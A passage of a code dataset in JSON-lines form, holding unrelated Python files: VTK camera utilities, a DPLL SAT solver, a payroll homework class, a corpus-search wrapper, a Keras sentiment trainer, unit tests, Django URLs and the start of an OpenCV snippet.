render_common.PositionType.TRANSVERSAL:\n if same_aspect_ratio is False:\n ortho_width = fov_left.ExtentLen\n ortho_height = fov_anterior.ExtentLen\n if b_orthogonal is True:\n eye_dir = fov_head.vecInPatient\n else:\n eye_dir = np.cross(fov_left.vecInPatient, fov_anterior.vecInPatient)\n up_dir = fov_anterior.vecInPatient\n else:\n if same_aspect_ratio is False:\n ortho_width = fov_left.ExtentLen\n ortho_height = fov_head.ExtentLen\n if b_orthogonal is True:\n eye_dir = fov_anterior.vecInPatient\n else:\n eye_dir = np.cross(fov_left.vecInPatient, fov_head.vecInPatient)\n up_dir = fov_head.vecInPatient\n\n eye_dir = eye_dir / np.linalg.norm(eye_dir)\n # pos_eye = eye_dir\n x_dir = np.cross(up_dir, eye_dir)\n x_dir = x_dir / np.linalg.norm(x_dir)\n\n # TODO [fei.wang@united-imaging.com] aspect_ratio should calculate and set into the viewport of windows\n # aspect_ratio = ortho_width / ortho_height\n\n # Step5: Set parameters of Camera\n\n factor = 1\n pos_eye = eye_dir * max_extent * factor + pos_look_at\n camera.SetClippingRange(max_extent * 1, max_extent * 6)\n\n camera.SetFocalPoint(pos_look_at)\n camera.SetPosition(pos_eye)\n camera.SetViewUp(up_dir)\n\n # render.ResetCamera()\n\n # Step6: Others for SetOrthoWindow(dOrthoWidth, dOrthoHeight);\n # TODO: fei.wang 20181006 The following parameters are useless for camera, Why ?\n camera.SetParallelProjection(True) # Not Useful ? In VKT, the AspectRation is Calculated by Render->ViewPort\n camera.SetParallelScale(ortho_height) # Not Useful ?\n screen_bottom_left = pos_look_at + x_dir * -0.5 + up_dir * -0.5 + eye_dir * 0.5\n screen_bottom_right = pos_look_at + x_dir * 0.5 + up_dir * -0.5 + eye_dir * 0.5\n screen_top_right = pos_look_at + x_dir * 0.5 + up_dir * 0.5 + eye_dir * 0.5\n render_common.logging.info(\"screen_bottom_left\" + str(screen_bottom_left)\n + \"screen_bottom_right\" + str(screen_bottom_right)\n + \"screen_top_right\" + str(screen_top_right))\n camera.SetScreenBottomLeft(screen_bottom_left) # default ScreenBottomLeft Value is : [-0.5, -0.5, -0.5]\n camera.SetScreenBottomRight(screen_bottom_right) # default ScreenBottomRight Value is : [0.5, -0.5, -0.5]\n camera.SetScreenTopRight(screen_top_right) # default ScreenTopRight Value is : [0.5, 0.5, -0.5]\n return camera\n\n\ndef get_default_vr_camera(dim, spacing, orientation, center, pos_type, same_aspect_ratio=False):\n \"\"\"\n\n :param dim:\n :param spacing:\n :param orientation:\n :param pos_type: render_common.PositionType.SAGITTAL: render_common.PositionType.TRANSVERSAL:\n :param camera: camera is the output result\n :param same_aspect_ratio: when TRA(横), COR(冠), SAG(矢), should be in the same scale, then the flag should be true\n :return:\n \"\"\"\n # Step1: Calculate the nearest axis of volume x-y-z in patient coord.\n # camera =render.GetActiveCamera()\n camera = vtk.vtkCamera()\n fov_head = FovInfo()\n fov_left = FovInfo()\n fov_anterior = FovInfo()\n cal_nearest_axis(dim, spacing, orientation, fov_head, fov_left, fov_anterior)\n\n # Step2: Calculate the position of camera look at point by different pos_type\n # pos_look_at = [0, 0, 0]\n pos_look_at = get_default_camera_lookat(fov_head, fov_left, fov_anterior, pos_type, center)\n\n # Step3: Get max of extent of the volume\n extent = [dim[0] * spacing[0], dim[1] * spacing[1], dim[2] * spacing[2]]\n # max_extent = np.max(extent)\n max_extent = np.linalg.norm(extent, ord=2) * 0.5\n # Step4: Calculate eye_dir and up_dir for different position type of MPR (TRA, COR,SAG)\n b_orthogonal = check_orthogonal(orientation)\n if pos_type is render_common.PositionType.SAGITTAL:\n if same_aspect_ratio is False:\n ortho_width = fov_anterior.ExtentLen\n ortho_height = fov_head.ExtentLen\n if b_orthogonal is True:\n eye_dir = fov_left.vecInPatient\n else:\n eye_dir = np.cross(fov_head.vecInPatient, fov_anterior.vecInPatient)\n up_dir = fov_head.vecInPatient\n elif pos_type is render_common.PositionType.TRANSVERSAL:\n if same_aspect_ratio is False:\n ortho_width = fov_left.ExtentLen\n ortho_height = fov_anterior.ExtentLen\n if b_orthogonal is True:\n eye_dir = fov_head.vecInPatient\n else:\n eye_dir = np.cross(fov_left.vecInPatient, fov_anterior.vecInPatient)\n up_dir = fov_anterior.vecInPatient\n else:\n if same_aspect_ratio is False:\n ortho_width = fov_left.ExtentLen\n ortho_height = fov_head.ExtentLen\n if b_orthogonal is True:\n eye_dir = fov_anterior.vecInPatient\n else:\n eye_dir = np.cross(fov_left.vecInPatient, fov_head.vecInPatient)\n up_dir = fov_head.vecInPatient\n\n eye_dir = eye_dir / np.linalg.norm(eye_dir)\n # pos_eye = eye_dir\n x_dir = np.cross(up_dir, eye_dir)\n x_dir = x_dir / np.linalg.norm(x_dir)\n\n # TODO [fei.wang@united-imaging.com] aspect_ratio should calculate and set into the viewport of windows\n # aspect_ratio = ortho_width / ortho_height\n\n # Step5: Set parameters of Camera\n\n factor = 3\n pos_eye = eye_dir * max_extent * factor + pos_look_at\n camera.SetClippingRange(max_extent * 2.5, max_extent * 3.5)\n\n camera.SetFocalPoint(pos_look_at)\n camera.SetPosition(pos_eye)\n camera.SetViewUp(up_dir)\n\n # render.ResetCamera()\n\n # Step6: Others for SetOrthoWindow(dOrthoWidth, dOrthoHeight);\n # TODO: fei.wang 20181006 The following parameters are useless for camera, Why ?\n camera.SetParallelProjection(True) # Not Useful ? In VKT, the AspectRation is Calculated by Render->ViewPort\n camera.SetParallelScale(ortho_height) # Not Useful ?\n screen_bottom_left = pos_look_at + x_dir * -0.5 + up_dir * -0.5 + eye_dir * 0.5\n screen_bottom_right = pos_look_at + x_dir * 0.5 + up_dir * -0.5 + eye_dir * 0.5\n screen_top_right = pos_look_at + x_dir * 0.5 + up_dir * 0.5 + eye_dir * 0.5\n render_common.logging.info(\"screen_bottom_left\" + str(screen_bottom_left)\n + \"screen_bottom_right\" + str(screen_bottom_right)\n + \"screen_top_right\" + str(screen_top_right))\n camera.SetScreenBottomLeft(screen_bottom_left) # default ScreenBottomLeft Value is : [-0.5, -0.5, -0.5]\n camera.SetScreenBottomRight(screen_bottom_right) # default ScreenBottomRight Value is : [0.5, -0.5, -0.5]\n camera.SetScreenTopRight(screen_top_right) # default ScreenTopRight Value is : [0.5, 0.5, -0.5]\n return camera\n\n\ndef get_slice_axis_matrix(camera):\n \"\"\"\n The function usually used to set matrix of MPR\n :param camera:\n :return:\n \"\"\"\n # Step1: calculate z_dir\n camera_pos = camera.GetPosition()\n camera_focal = camera.GetFocalPoint()\n z_dir = [camera_pos[0] - camera_focal[0], camera_pos[1] - camera_focal[1], camera_pos[2] - camera_focal[2]]\n z_dir_norm = np.linalg.norm(z_dir, ord=2)\n z_dir_normalized = z_dir / z_dir_norm\n render_common.logging.info(\"z_dir_normalized\" + str(z_dir_normalized[0])\n + str(z_dir_normalized[1]) + str(z_dir_normalized[2]))\n # Step2: Calculate y_dir\n camera_view_up = camera.GetViewUp()\n camera_view_up = camera_view_up / np.linalg.norm(camera_view_up)\n\n # Step3: Calculate x_dir\n x_dir_normal = np.cross(camera_view_up, z_dir_normalized)\n\n # Step4: Get SliceAxis Matrix of MPR\n return ((x_dir_normal[0], camera_view_up[0], z_dir_normalized[0], camera_focal[0],\n x_dir_normal[1], camera_view_up[1], z_dir_normalized[1], camera_focal[1],\n x_dir_normal[2], camera_view_up[2], z_dir_normalized[2], camera_focal[2],\n 0, 0, 0, 1))\n\n\ndef np_2_vtkMatrix(mat):\n if mat.shape == (4, 4):\n obj = vtk.vtkMatrix4x4()\n for i in range(4):\n for j in range(4):\n obj.SetElement(i, j, mat[i, j])\n return obj\n\n\ndef vtkMatrix_to_np(vtk_mat):\n if isinstance(vtk_mat, vtk.vtkMatrix4x4):\n np_mat = np.matrix(np.arange(16).reshape(4, 4), dtype=float)\n if np_mat.shape == (4, 4):\n for i in range(4):\n for j in range(4):\n np_mat[i, j] = vtk_mat.GetElement(i, j)\n return np_mat\n\n\ndef get_view_matrix(camera):\n return vtkMatrix_to_np(camera.GetViewTransformMatrix)\n\n\ndef get_projection_matrix(scene):\n camera = scene.get_camera()\n projection_matrix = camera.GetProjectionTransformMatrix(scene.get_render())\n return vtkMatrix_to_np(projection_matrix)\n\n\ndef tranform_world_to_screen_vtk_inner(vtk_view_port, vtk_camera, point3dworld):\n # World2View Tranform\n cur_camera = vtk_camera\n vtk_view_port.ComputeAspect()\n mat_vp = cur_camera.GetCompositeProjectionTransformMatrix(vtk_view_port.GetTiledAspectRatio(), 0, 1)\n point3dworld[3] = 1.0\n x0 = mat_vp.GetElement(0, 0)*point3dworld[0] + mat_vp.GetElement(0, 1)*point3dworld[1] \\\n + mat_vp.GetElement(0, 2)*point3dworld[2] + mat_vp.GetElement(0, 3)*point3dworld[3]\n x1 = mat_vp.GetElement(1, 0) * point3dworld[0] + mat_vp.GetElement(1, 1) * point3dworld[1] \\\n + mat_vp.GetElement(1, 2) * point3dworld[2] + mat_vp.GetElement(1, 3) * point3dworld[3]\n x2 = mat_vp.GetElement(2, 0) * point3dworld[0] + mat_vp.GetElement(2, 1) * point3dworld[1] \\\n + mat_vp.GetElement(2, 2) * point3dworld[2] + mat_vp.GetElement(2, 3) * point3dworld[3]\n x3 = mat_vp.GetElement(3, 0) * point3dworld[0] + mat_vp.GetElement(3, 1) * point3dworld[1] \\\n + mat_vp.GetElement(3, 2) * point3dworld[2] + mat_vp.GetElement(3, 3) * point3dworld[3]\n\n point4d_view = [x0, x1, x2, x3]\n if point4d_view[3] != 0:\n point4d_view = [point4d_view[0] / point4d_view[3], point4d_view[1] / point4d_view[3],\n point4d_view[2] / point4d_view[3], point4d_view[3] / point4d_view[3]]\n\n vtk_view_port.SetViewPoint([point4d_view[0], point4d_view[1], point4d_view[2]])\n vtk_view_port.ViewToDisplay()\n point3d_screen = vtk_view_port.GetDisplayPoint()\n return point3d_screen\n\n\ndef transform_world_to_screen_vtk(scene, point3dworld):\n cur_renderer = scene.get_render()\n cur_camera = scene.get_camera()\n return tranform_world_to_screen_vtk_inner(cur_renderer, cur_camera, point3dworld)\n\n\ndef transform_screen_to_world_vtk_inner(vtk_view_port, vtk_camera, point3dscreen):\n # Screen2View Transform\n vtk_view_port.SetDisplayPoint(point3dscreen)\n vtk_view_port.DisplayToView()\n point3dscreen = vtk_view_port.GetViewPoint() # Range in [-1, 1]\n\n # View2World Transform\n cur_camera = vtk_camera\n mat_vp = cur_camera.GetCompositeProjectionTransformMatrix(vtk_view_port.GetTiledAspectRatio(), 0, 1)\n mat_vp_invert = vtk.vtkMatrix4x4()\n vtkMatrix4x4.Invert(mat_vp, mat_vp_invert)\n point4dscreen = [point3dscreen[0], point3dscreen[1], point3dscreen[2], 1.0]\n x0 = mat_vp_invert.GetElement(0, 0)*point4dscreen[0] + mat_vp_invert.GetElement(0, 1)*point4dscreen[1] \\\n + mat_vp_invert.GetElement(0, 2)*point4dscreen[2] + mat_vp_invert.GetElement(0, 3)*point4dscreen[3]\n x1 = mat_vp_invert.GetElement(1, 0) * point4dscreen[0] + mat_vp_invert.GetElement(1, 1) * point4dscreen[1] \\\n + mat_vp_invert.GetElement(1, 2) * point4dscreen[2] + mat_vp_invert.GetElement(1, 3) * point4dscreen[3]\n x2 = mat_vp_invert.GetElement(2, 0) * point4dscreen[0] + mat_vp_invert.GetElement(2, 1) * point4dscreen[1] \\\n + mat_vp_invert.GetElement(2, 2) * point4dscreen[2] + mat_vp_invert.GetElement(2, 3) * point4dscreen[3]\n x3 = mat_vp_invert.GetElement(3, 0) * point4dscreen[0] + mat_vp_invert.GetElement(3, 1) * point4dscreen[1] \\\n + mat_vp_invert.GetElement(3, 2) * point4dscreen[2] + mat_vp_invert.GetElement(3, 3) * point4dscreen[3]\n\n point4d_world = [x0, x1, x2, x3]\n if point4d_world[3] != 0:\n point4d_world = [point4d_world[0] / point4d_world[3], point4d_world[1] / point4d_world[3],\n point4d_world[2] / point4d_world[3], point4d_world[3] / point4d_world[3]]\n return [point4d_world[0], point4d_world[1], point4d_world[2]]\n\n\ndef transform_screen_to_world_vtk(scene, point3dscreen):\n cur_renderer = scene.get_render()\n cur_camera = scene.get_camera()\n return transform_screen_to_world_vtk_inner(cur_renderer, cur_camera, point3dscreen)\n\n\ndef transform_screen_to_world_zwh(scene, point2d):\n cur_renderer = scene.get_render()\n picker = vtkWorldPointPicker()\n picker.Pick(point2d[0], point2d[1], 0, cur_renderer)\n last_point = picker.GetPickPosition()\n return last_point\n\n\ndef transform_screen_to_world(scene, point2d):\n \"\"\"\n tranform screen to world\n :param Renderer:\n :param point2d:\n :return:\n \"\"\"\n point3d_screen = [point2d[0], point2d[1], 0.0]\n return transform_screen_to_world_vtk(scene, point3d_screen)\n\n\ndef transform_world_to_screen(scene, point3d_world):\n \"\"\"\n tranform screen to world\n :param Renderer:\n :param point2d:\n :return:\n \"\"\"\n screen3d = transform_world_to_screen_vtk(scene, [point3d_world[0], point3d_world[1], point3d_world[2], 1.0])\n return [screen3d[0], screen3d[1]]\n\n","sub_path":"visualization/camera_utility.py","file_name":"camera_utility.py","file_ext":"py","file_size_in_byte":25907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"438130645","text":"class Point:\n def __init__(self,x,y,color=\"\"):\n self.x =x\n self.y=y\n self.color=color\n\nclass Circle:\n def __init__(self, center, radius, color=''):\n self.center=center\n self.radius=checkValue(radius,\"radius\")\n self.color=color\n\nclass Rect:\n def __init__(self, center, width, height, color=''):\n self.center = center\n self.width = checkValue(width,\"width\")\n self.height =checkValue(height,\"height\")\n self.color=color\n\nclass Polygon:\n def __init__ (self, points, color=''):\n self.points=points\n self.color = color\n\ndef checkValue(val, attribute):\n if val>0:\n return val\n else:\n print(\"Error: \"+attribute +\" cannot be less than 0\")\n exit(1)\n","sub_path":"src/model/shape.py","file_name":"shape.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"387161054","text":"from copy import deepcopy\n# import pdb\n\n\ndef has_singleatom(A):\n for sublist in A:\n if len(sublist) == 1:\n return True\n return False\n\n\ndef has_empty(A):\n for sublist in A:\n if len(sublist) == 0:\n return True\n return False\n\n\ndef complement(atom):\n if atom[0] == '-':\n return atom[1]\n else:\n return '-' + atom\n\n\ndef is_negation(atom):\n if atom[0] == '-':\n return True\n else:\n return False\n\n\ndef unitPropagate(A, partial):\n # pdb.set_trace()\n while has_singleatom(A):\n for sublist in A:\n if len(sublist) == 1:\n pureatom = sublist[0]\n suppose(pureatom, A, partial)\n\n\ndef find_unassigned(wholelist, I):\n for sublist in wholelist:\n for atom in sublist:\n if is_negation(atom):\n check = complement(atom)\n else:\n check = atom\n if I.get(check, -1) == -1:\n return check\n\n\ndef suppose(pureatom, A, I):\n if (is_negation(pureatom)):\n assert I.get(complement(pureatom), -1) == -1, 'Acceding defined letter'\n I[complement(pureatom)] = 0\n else:\n assert I.get(pureatom, -1) == -1, 'Acceding defined letter'\n I[pureatom] = 1\n\n pureatom_complement = complement(pureatom)\n i = 0\n while i != len(A):\n sublist = A[i]\n if pureatom in sublist:\n A.pop(i)\n i = 0\n continue\n elif pureatom_complement in sublist:\n sublist.remove(pureatom_complement)\n i += 1\n\n\ndef DPLL(S, I):\n unitPropagate(S, I)\n if has_empty(S):\n return 'Insatisfacible', {}\n if len(S) == 0:\n return 'Satisfacible', I\n\n l = find_unassigned(S, I)\n S_prime = deepcopy(S)\n I_prime = deepcopy(I)\n suppose(l, S_prime, I_prime)\n maybe, S_prime_prime = DPLL(S_prime, I_prime)\n if maybe == 'Satisfacible':\n return 'Satisfacible', S_prime_prime\n else:\n S_prime2 = deepcopy(S)\n I_prime2 = deepcopy(I)\n suppose(complement(l), S_prime2, I_prime2)\n return DPLL(S_prime2, I_prime2)\n","sub_path":"DPLL.py","file_name":"DPLL.py","file_ext":"py","file_size_in_byte":2132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"595263623","text":"# 有参无参,返回值\ndef show(name, age):\n print(\"My name is %s, I am %d years old\" % (name, age))\n\n\nshow(\"chen\", 28)\n\n\ndef return_value(name):\n return \"hello \" + name\n\n\nres = return_value(\"chen\")\nprint(res)\n\n\n# 缺省函数, 函数定义的时候参数就有值\ndef sum_name(a=1, b=2):\n return a + b\n\n\nprint(sum_name())\nprint(sum_name(3, 5))\nprint(sum_name(b=3, a=4)) # 关键字传参,不用注意顺序\n\n\n# 不定长参数, 是传入一个tuple, 不能使用关键字来指定\ndef sum_num(*args):\n print(args, type(args))\n\n r = 0\n for i in args:\n r += i\n return r\n\n\nrr = sum_num(1, 2, 3)\nprint(rr)\n\n\n# 不定长参数,传入一个dict, 必须使用关键字传参,指定kv\ndef sum_dict(**kwargs):\n print(kwargs, type(kwargs))\n\n for key, value in kwargs.items():\n print(key, value)\n\n\nsum_dict(a=1, b=2, c=3, name=\"tom\")","sub_path":"python_basic/day03/01-函数定义.py","file_name":"01-函数定义.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"41655513","text":"\"\"\"\ncs1114\n\nSubmission: rec08\n\nProgrammer: Yogesh Dhamija\nUsername: yad220\n\nThis module contains the Company type. \n\"\"\"\n\nfrom hw10_worker import *\n\nCOMPANY_DUPLICATE_WORKER_ERROR = 10001\nCOMPANY_NEGATIVE_HOURS_ERROR = 12345\nCOMPANY_TOO_LOW_WAGE_ERROR = 76547\nCOMPANY_TOO_HIGH_WAGE_ERROR = 67583\n\nCOMPANY_SUCCESS_CODE = 11111\n\nclass Company(object):\n\t\n\tdef __init__(self, name):\n\t\tself.__name = name\n\t\tself.__workers = {}\n\t\n\tdef addWorker(self, ssn, name):\n\t\t\"\"\" \"\"\"\n\t\tnewWorker = WorkerRec(ssn, name)\n\t\tif newWorker in self.__workers.keys():\n\t\t\treturn COMPANY_DUPLICATE_WORKER_ERROR\n\t\telse:\n\t\t\tself.__workers[newWorker.getSSN()] = newWorker\n\t\t\treturn COMPANY_SUCCESS_CODE\n\t\n\tdef addWorkerHours(self, ssn, hours):\n\t\t\"\"\" \"\"\"\n\t\tcode = self.__workers[ssn].addHours(hours)\n\t\tif(code == WORKER_SUCCESS_CODE):\n\t\t\treturn COMPANY_SUCCESS_CODE\n\t\telif(code == WORKER_NEGATIVE_HOURS_ERROR):\n\t\t\treturn COMPANY_NEGATIVE_HOURS_ERROR\n\t\n\tdef changeWorkerRate(self, ssn, rate):\n\t\t\"\"\" \"\"\"\n\t\tcode = self.__workers[ssn].setRate(rate)\n\t\tif(code == WORKER_SUCCESS_CODE):\n\t\t\treturn COMPANY_SUCCESS_CODE\n\t\telif(code == WORKER_TOO_LOW_WAGE_ERROR):\n\t\t\treturn COMPANY_TOO_LOW_WAGE_ERROR\n\t\telif(code == WORKER_TOO_HIGH_WAGE_ERROR):\n\t\t\treturn COMPANY_TOO_HIGH_WAGE_ERROR\n\t\n\tdef changeWorkerTitle(self, ssn, title):\n\t\t\"\"\" \"\"\"\n\t\tcode = self.__workers[ssn].setTitle(title)\n\t\tif(code == WORKER_SUCCESS_CODE):\n\t\t\treturn COMPANY_SUCCESS_CODE\n\t\n\tdef payAllWorkers(self):\n\t\t\"\"\" \"\"\"\n\t\tpayList = self.__payWorkersReturnList()\n\t\tpayList.sort()\n\t\twriteString = \"\"\n\t\tfor item in payList:\n\t\t\ttitleString = ' [%s]' % (item[3]) if item[3] != None else ''\n\t\t\twriteString = writeString + self.__makePrettyFormat(item[0], item[1], item[2], titleString)\n\t\tfilePath = \"%s.pay\" % (self.__name.strip())\n\t\thandle = open(filePath, 'w')\n\t\thandle.write(writeString)\n\t\thandle.close()\n\t\treturn COMPANY_SUCCESS_CODE\n\t\n\tdef __payWorkersReturnList(self):\n\t\t\"\"\" \"\"\"\n\t\tpayList = []\n\t\t# Structure of payList is [ [owed, SSN, name, title], [owed, SSN, name, title], ... ]\n\t\tfor item in self.__workers.values():\n\t\t\tcode = item.payWorker()\n\t\t\tif(code == WORKER_SUCCESS_CODE):\n\t\t\t\tpayList.append( [ item.getPay(), item.getSSN(), item.getName(), item.getTitle() ] )\n\t\treturn payList\n\t\n\tdef __makePrettyFormat(self, owed, ssn, name, title):\n\t\t\"\"\" \"\"\"\n\t\treturn (\"%i\\n%s $%0.2f%s\\n\") % (ssn, name, owed, title)\n\t\n\tdef fireWorker(self, ssn):\n\t\t\"\"\" \"\"\"\n\t\tcode = self.__workers[ssn].payWorker()\n\t\tif(code == WORKER_SUCCESS_CODE):\n\t\t\tfilePath = \"%s.FINAL.pay\" % (self.__workers[ssn].getName())\n\t\t\twriteString = \"\"\n\t\t\ttitleString = ' [%s]' % (self.__workers[ssn].getTitle()) if self.__workers[ssn].getTitle() != None else ''\n\t\t\twriteString = writeString + self.__makePrettyFormat(self.__workers[ssn].getPay(), ssn, self.__workers[ssn].getName(), titleString)\n\t\t\thandle = open(filePath, 'w')\n\t\t\thandle.write(writeString)\n\t\t\thandle.close()\n\t\t\tdel(self.__workers[ssn])\n\t\t\treturn COMPANY_SUCCESS_CODE\n","sub_path":"Homework/hw10/hw10_company.py","file_name":"hw10_company.py","file_ext":"py","file_size_in_byte":2919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"612667101","text":"# python3\n# coding=\n\nfrom collections import Iterable\nimport warnings\nfrom time import sleep\nfrom tqdm import tqdm\nfrom .result import Result\nfrom .corpora import *\n\n\nfunctions = {\n 'rus': rus_corpus,\n 'bam': bam_corpus,\n 'emk': emk_corpus,\n 'zho': zho_corpus,\n 'rus_parallel': rus_parallel_corpus,\n 'dan': dan_corpus,\n 'est': est_corpus,\n 'kat': kat_corpus\n }\n\n\nclass Corpus:\n def __init__(self, language, sleep_time=1, sleep_each=5):\n \"\"\"\n language: str: language alias\n sleep_time: int: sleeping time in seconds\n sleep_each: int: sleep after each `sleep_each` request\n \"\"\"\n \n self.language = language\n self.__corpus = functions[self.language] \n self.doc = self.__corpus.__doc__\n \n self.results = list()\n self.failed = list()\n self.__retry_flag = False\n \n self.__warn = 'Nothing found for query \"%s\".\\n' \\\n 'Call `retry_failed` method to retry failed queries'\n self.__pbar_desc = '\"%s\"'\n self.__type_except = 'Argument `query` must be of type or iterable, got <%s>'\n\n if sleep_each < 1:\n raise ValueError('Argument `sleep_each` must be >= 1')\n \n self.sleep_each = sleep_each\n self.sleep_time = sleep_time\n\n def search(self, query, *args, **kwargs):\n \"\"\"\n query: str: query\n for arguments see `params_container.Container`\n \"\"\"\n \n if isinstance(query, str):\n query = [query]\n \n if not isinstance(query, Iterable):\n raise TypeError(self.__type_except % type(query))\n \n if args:\n progress_total = args[0]\n elif 'numResults' in kwargs:\n progress_total = kwargs['numResults']\n else:\n progress_total = 100\n \n _results = list()\n \n for q in query:\n self.parser = self.__corpus.PageParser(q, *args, **kwargs)\n _r = Result(self.language, self.parser.__dict__)\n q_desc = self.__pbar_desc % q\n \n for t in tqdm(self.parser.extract(),\n total=progress_total,\n unit='docs',\n desc=q_desc):\n _r.add(t)\n if _r.N % self.sleep_each == 0:\n sleep(self.sleep_time)\n \n _results.append(_r)\n if _r.N < 1:\n warnings.warn(self.__warn % q)\n if not self.__retry_flag:\n self.failed.append(_r)\n \n if not self.__retry_flag:\n self.results.extend(_results)\n \n return _results\n\n def retry_failed(self):\n \"\"\"\n Calls `.search()` for failed queries stored in `.failed`\n \n ISSUE:\n if `_r` got successfully retrieved here,\n its empty `Result` is still left in `Corpus.results` \n \"\"\"\n if self.failed:\n self.__retry_flag = True\n _pos = list()\n _neg = list()\n \n for r in self.failed:\n _r = self.search(r.query, **r.params)[0]\n if _r.N > 0:\n _pos.append(_r)\n else:\n _neg.append(_r)\n \n self.failed = _neg[:]\n self.results.extend(_pos)\n self.__retry_flag = False\n \n return _pos\n \n else:\n return []\n","sub_path":"lingcorpora/corpus.py","file_name":"corpus.py","file_ext":"py","file_size_in_byte":3624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"450282899","text":"import argparse\nimport os\n\nimport numpy as np\nimport tensorflow as tf\nimport data_helper\nfrom random import shuffle\n\nfrom keras import backend as K\nfrom keras import models\nfrom keras import layers\nfrom keras import optimizers\n\nif __name__ == '__main__':\n args = argparse.ArgumentParser()\n args.add_argument('--strmaxlen', type=int, default=150)\n args.add_argument('--epochs', type=int, default=100)\n args.add_argument('--batch', type=int, default=10)\n args.add_argument('--embedding', type=int, default=256)\n args.add_argument('--featuresize', type=int, default=129) # ascii code 기준 0~127 + 1\n config = args.parse_args()\n\n inputs = layers.Input((config.strmaxlen,)) \n layer = layers.Embedding(config.featuresize, config.embedding, input_length=config.strmaxlen, mask_zero = True)(inputs)\n layer = layers.Bidirectional(layers.GRU(128, return_sequences=True))(layer)\n layer = layers.Bidirectional(layers.GRU(128, return_sequences=False))(layer)\n\n layer_dense = layers.Dense(3)(layer)\n outputs_softmax = layers.Activation('softmax')(layer_dense)\n\n model = models.Model(inputs=inputs, outputs=outputs_softmax)\n model.summary()\n model.compile(optimizer=optimizers.Adam(lr=0.001,amsgrad=True), loss='binary_crossentropy', metrics=['accuracy'])\n \n file_train_instances = \"sample50.csv\" #데이터셋 파일 이름\n \n # Load data\n print(\"Loading data...\") \n sentences, sentimentlabels = data_helper.load_data_and_labels(file_train_instances,config.strmaxlen)\n \n dataset_len = len(sentences)\n one_batch_size = dataset_len//config.batch\n if dataset_len % config.batch != 0:\n one_batch_size += 1\n \n sentiment_dataset = list(zip(sentences,sentimentlabels))\n print(sentiment_dataset)\n \n # epoch마다 학습을 수행합니다.\n for epoch in range(config.epochs):\n avg_loss = 0.0\n avg_acc = 0.0\n \n shuffle(sentiment_dataset)\n for batch in enumerate(data_helper._batch_loader(sentiment_dataset, config.batch)):\n i = batch[0] # enumerate - index\n data, labels = zip(*batch[1]) #batch[1] = (data,labels) -> 이걸 data, labels로 분리한다.\n data = np.array(data) # numpy array화\n labels = np.array(labels) # numpy array화\n loss, acc = model.train_on_batch(data, labels)\n print('Batch : ', i + 1, '/', one_batch_size,\n ', loss in this minibatch: ', float(loss),\n ', acc in this minibatch: ', float(acc))\n avg_loss += float(loss)\n avg_acc += float(acc)\n \n print('epoch:', epoch, ' train_loss:', float(avg_loss/one_batch_size), ' train_acc:', float(avg_acc/one_batch_size)) \n filename = str(\"model-epoch \"+ str(epoch))\n model.save(filename)","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"242057634","text":"import item\nimport date\nimport unittest\n\n#class TestSequenceFunctions(unittest.TestCase):\n\n#def setUp():\n\ndef test_chocoladeshot(self):\n\t\ttoday = date.Date(1,1,1,1,1,2013)\n\t\ttempdate = date.Date(10,1,3,1,5,2014)\n\t\tchocoshot = item.Chocoladeshot(today,tempdate,1)\n\t\tself.assertEqual(chocoshot.getColor(),\"wit\")\n\t\tchocoshot.setColor(2)\n\t\tself.assertEqual(chocoshot.getColor(),\"bruin\")\n\t\tself.assertEqual(chocoshot.getPrice(),1)\n\ndef test_honing(self):\n\t\ttoday = date.Date(1,1,1,1,1,2013)\n\t\ttempdate = date.Date(10,1,3,1,5,2014)\n\t\thoning = item.Honing(today,tempdate)\n\t\tself.assertEqual(honing.getPrice(),0.50)\n\ndef test_Marshmallow(self):\n\t\ttoday = date.Date(1,1,1,1,1,2013)\n\t\ttempdate = date.Date(10,1,3,1,5,2014)\n\t\tmarshmallow = item.Marshmallow(today,tempdate)\n\t\tself.assertEqual(marshmallow.getPrice(),0.75)\n\ndef test_Chilipeper(self):\n\t\ttoday = date.Date(1,1,1,1,1,2013)\n\t\ttempdate = date.Date(10,1,3,1,5,2014)\n\t\tchilipeper = item.Chilipeper(today,tempdate)\n\t\tself.assertEqual(chilipeper.getPrice(),0.25)\n\n\t\ndef test(self):\t\n\tprint()\n\tprint(\"starting testing testItem\")\n\ttest_chocoladeshot(self)\n\ttest_honing(self)\n\ttest_Marshmallow(self)\n\ttest_Chilipeper(self)\n\tprint(\"finished testing testItem\")\n\t\n \n\nif __name__ == '__main__':\n\tunittest.main()\n","sub_path":"Project/testItem.py","file_name":"testItem.py","file_ext":"py","file_size_in_byte":1255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"361753016","text":"# _*_ coding:utf-8 _*_\n_author_ = 'jackson'\n_date_ = '2019/4/7 16:50'\n\n\nfrom django.conf.urls import url,include\nfrom .views import MoocsListView,MoocDetailView,AddFavView\n\nurlpatterns = [\n #慕课小组列表页\n url(r'^list/$', MoocsListView.as_view(), name=\"mooc_list\"),\n\n #慕课小组详情页\n url(r'^detail/(?P\\d+)/$', MoocDetailView.as_view(), name=\"mooc_detail\"),\n # url(r'^detail/$', MoocDetailView.as_view(), name=\"moocs_detail\"),\n\n #慕课收藏\n url(r'^add_fav/$',AddFavView.as_view(),name=\"add_fav\")\n\n]","sub_path":"apps/moocs/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"626692394","text":"import os\n\nimport cv2\nimport numpy as np\n\npath = os.getcwd() + os.sep\n# path += '../db_aulas/Imagens/obama.jpeg'\npath += '../db_images/jpeg/captcha.jpeg'\n# path += '../db_images/png/captcha.png'\n\nimg = cv2.imread(path)\ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\ndetector = cv2.FastFeatureDetector_create()\nkps = 